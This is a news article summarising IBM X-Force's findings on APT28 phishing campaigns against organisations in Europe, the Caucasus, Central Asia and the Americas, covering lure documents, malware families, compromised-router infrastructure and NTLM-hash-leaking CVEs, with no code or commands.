IBM X-Force threat intelligence team has uncovered a series of highly sophisticated phishing campaigns orchestrated by the notorious Russian state-sponsored group APT28 (aka UAC-028, Fancy Bear, and Forest Blizzard) targeting organizations across Europe, the South Caucasus, Central Asia, and North and South America.
The modus operandi of the group, which the X-Force team tracks as ITG05 involves the deployment of multiple lure documents, disguised as authentic materials from entities in Argentina, Ukraine, Georgia, Belarus, Kazakhstan, Poland, Armenia, Azerbaijan, and the United States. These documents, a blend of both internal and publicly available files, cover a wide array of topics including finance, critical infrastructure, executive engagements, cybersecurity, maritime security, healthcare, and defense industrial production.
Among these, four Ukrainian-language documents have been identified, covering a range of topics from legislative amendments to international healthcare acquisitions. Notably, these documents date back to the period between November 2023 and January 2024.
The investigation into the attacks revealed that the threat actor is using the hosting provider firstcloudit[.]com to stage payloads. The group has also been observed employing novel techniques such as abusing the “search-ms” protocol and WebDAV servers to deploy malware, including the recently discovered Masepie and Oceanmap backdoors. The latter exhibits similarities to the Credomap malware, the researchers said.
X-Force noted that APT28 has replaced older, more complex malware like Credomap with simplified PowerShell scripts like Steelhook.
An analysis of the infrastructure showed that the Common Name used in the TLS certificates indicates that both the WebDAV, as well as the Masepie command-and-control (C2) servers, may be hosted on compromised Ubiquiti routers. In February 2024, the US authorities disrupted a network comprised of hacked Ubiquiti EdgeRouters operated by APT28. The same network was used by the threat actor to target Ukrainian military personnel with phishing attacks a month prior to the takedown.
The researchers believe that the group may be using the new vulnerabilities to leak NTLMv2 hashes in addition to deploying secondary payloads.
The team assesses that the threat actor may take advantage of vulnerabilities that enable the theft of NTLMv2 hashes, including Outlook flaws (CVE-2023-35636, CVE-2024-21413), and the recent Microsoft Exchange vulnerability (CVE-2024-21410).
“ITG05 remains adaptable to changes in opportunity by delivering new infection methodologies and leveraging commercially available infrastructure, while consistently evolving malware capabilities. X-Force assesses with high confidence that ITG05 will continue to leverage attacks against world governments and their political apparatus to provide Russia with advanced insight into emergent policy decisions,” the threat hunters warned.
